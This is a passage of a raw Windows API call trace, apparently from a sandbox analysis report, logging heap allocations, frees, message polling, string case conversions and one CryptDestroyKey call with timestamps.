CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0264.029] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.029] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0264.029] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.029] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0264.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0264.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0264.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0264.030] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.030] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0264.030] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0264.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0264.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0264.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0264.030] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0264.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0264.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0264.031] CryptDestroyKey (hKey=0xaa5820) returned 1 [0264.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0264.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0264.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0264.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0264.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0264.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0264.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0264.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0264.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0264.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0264.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0264.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0264.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0264.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0264.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0264.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0264.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0264.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0264.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0264.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0264.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0264.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0264.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0264.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0264.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0264.033] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0264.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0264.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0264.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0264.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0264.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0264.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0264.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0264.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0264.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0264.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0264.035] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0264.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0264.035] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0264.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0264.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0264.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e28 [0264.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0264.036] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0264.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0264.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0264.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0264.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0264.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0264.036] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0264.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0264.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0264.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0264.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0264.037] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0264.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0264.037] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0264.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0264.037] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0264.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0264.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0264.038] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0264.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.038] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0264.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0264.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0264.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0264.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0264.038] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0264.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0264.039] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0264.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0264.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0264.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0264.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0264.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0264.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0264.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0264.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0264.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0264.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0264.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0264.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0264.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0264.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0264.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0264.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0264.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0264.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0264.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0264.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0264.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0264.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0264.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0264.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0264.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0264.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0264.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0264.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0264.045] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0264.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0264.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.045] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0264.045] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0264.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0264.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.046] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0264.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.051] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0264.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0264.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0264.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0264.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.051] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0264.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0264.051] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0264.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0264.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0264.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0264.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0264.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0264.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0264.053] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0264.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0264.053] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0264.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.053] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: 